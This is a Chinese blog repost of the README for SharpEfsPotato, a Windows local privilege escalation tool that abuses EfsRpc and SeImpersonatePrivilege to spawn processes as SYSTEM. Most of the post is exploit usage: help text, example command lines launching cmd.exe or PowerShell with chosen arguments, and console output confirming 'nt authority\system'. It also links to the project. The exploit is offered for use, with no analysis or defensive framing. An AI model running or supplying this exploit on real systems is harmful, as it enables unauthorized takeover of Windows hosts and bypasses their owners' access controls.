首页 提权EXP 正文
  • 本文约1935字,阅读需10分钟
  • 1318
  • 0

SharpEfsPotato

SharpEfs土豆
使用 EfsRpc 从 SeImpersonatePrivilege 进行本地权限提升。

由 @EthicalChaos 的 SweetPotato 和 @ cube0x0的 SharpSystemTriggers/SharpEfsTrigger 构建。

用法

C:\temp>SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -h, --help                 Display this help

例子
默认行为:在单独的进程中作为系统启动 cmd.exe(在单独的控制台中)

C:\temp>SharpEfsPotato.exe
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/\44259a4a-cbea-499b-9dc5-a9b1c13a4b9f\44259a4a-cbea-499b-9dc5-a9b1c13a4b9f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

指定 PowerShell 二进制文件和参数

C:\temp>SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

项目地址:https://github.com/bugch3ck/SharpEfsPotato

标签:EfsPotato
温馨提示:本文最后更新于2022年10月20日 16:35,若内容或图片失效,请在下方留言或联系博主。
评论
博主关闭了评论